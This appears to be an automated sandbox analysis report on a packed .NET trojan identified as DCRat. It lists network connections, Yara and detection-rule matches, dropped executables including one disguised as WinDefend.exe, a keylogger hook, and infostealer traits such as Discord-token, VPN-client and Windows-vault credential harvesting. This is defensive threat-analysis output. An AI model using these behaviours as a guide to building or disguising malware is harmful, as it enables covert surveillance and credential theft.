Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR
Source: Client.exe.0.dr, Keylogger.cs .Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Keylogger.cs .Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Keylogger.cs .Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Keylogger.cs .Net Code: KeyboardLayout
Source: C:\Users\user\AppData\Roaming\Loader.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Loader.exe

System Summary

Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: WinDefend.exe.0.dr Static PE information: section name: %q2hF6
Source: WinDefend.exe.0.dr Static PE information: section name:
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 2_2_00007FF848F03D5E NtProtectVirtualMemory, 2_2_00007FF848F03D5E
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Code function: 3_2_00007FF848F131DE NtProtectVirtualMemory, 3_2_00007FF848F131DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 18_2_00007FF848F431DE NtProtectVirtualMemory, 18_2_00007FF848F431DE
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 19_2_00007FF848F13D6E NtProtectVirtualMemory, 19_2_00007FF848F13D6E
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 19_2_00007FF848F14048 NtProtectVirtualMemory, 19_2_00007FF848F14048
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF848F33DBE NtProtectVirtualMemory, 20_2_00007FF848F33DBE
Source: C:\Users\user\AppData\Roaming\Loaader.exe Code function: 21_2_00007FF848F031DE NtProtectVirtualMemory, 21_2_00007FF848F031DE
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_01527428 22_2_01527428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_01522748 22_2_01522748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_01522739 22_2_01522739
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_01527648 22_2_01527648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_01527639 22_2_01527639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_0544A388 22_2_0544A388
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_0544A398 22_2_0544A398
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_054483B4 22_2_054483B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DD97B4 22_2_05DD97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DD9F48 22_2_05DD9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DDEEF0 22_2_05DDEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DD7E71 22_2_05DD7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DDE8F8 22_2_05DDE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DDD290 22_2_05DDD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DD9D69 22_2_05DD9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DDF770 22_2_05DDF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DDEEE0 22_2_05DDEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DDE8E9 22_2_05DDE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_05DDF348 22_2_05DDF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_062C17B8 22_2_062C17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_062C0C18 22_2_062C0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_062C1274 22_2_062C1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_062C125F 22_2_062C125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_062C17A8 22_2_062C17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 22_2_062C0C08 22_2_062C0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_00007FF848FD323D 25_2_00007FF848FD323D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_00007FF848FD8D9E 25_2_00007FF848FD8D9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_00007FF848FD531A 25_2_00007FF848FD531A
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01130848 31_2_01130848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01133B50 31_2_01133B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_011332D0 31_2_011332D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_011345C0 31_2_011345C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01138C78 31_2_01138C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01135480 31_2_01135480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0113161E 31_2_0113161E
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01130838 31_2_01130838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_011378B0 31_2_011378B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_011370A8 31_2_011370A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_011378C0 31_2_011378C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01135399 31_2_01135399
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0113326F 31_2_0113326F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01136298 31_2_01136298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01136D90 31_2_01136D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01136DA0 31_2_01136DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01138C20 31_2_01138C20
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01137428 31_2_01137428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01132738 31_2_01132738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01132748 31_2_01132748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01137639 31_2_01137639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_01137648 31_2_01137648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5AD290 31_2_0B5AD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5AE8F8 31_2_0B5AE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5A9F48 31_2_0B5A9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5AF770 31_2_0B5AF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5A97B4 31_2_0B5A97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5A7E71 31_2_0B5A7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5AEEF0 31_2_0B5AEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5AF348 31_2_0B5AF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5AE8E9 31_2_0B5AE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5A17E9 31_2_0B5A17E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5AEEE0 31_2_0B5AEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0B5A9D69 31_2_0B5A9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0EDF17B8 31_2_0EDF17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0EDF0C18 31_2_0EDF0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0EDF125F 31_2_0EDF125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0EDF1274 31_2_0EDF1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0EDF17A8 31_2_0EDF17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Code function: 31_2_0EDF0C08 31_2_0EDF0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 47_2_00007FF848FE542A 47_2_00007FF848FE542A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 47_2_00007FF848FE334D 47_2_00007FF848FE334D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Infected.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Loaader.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720
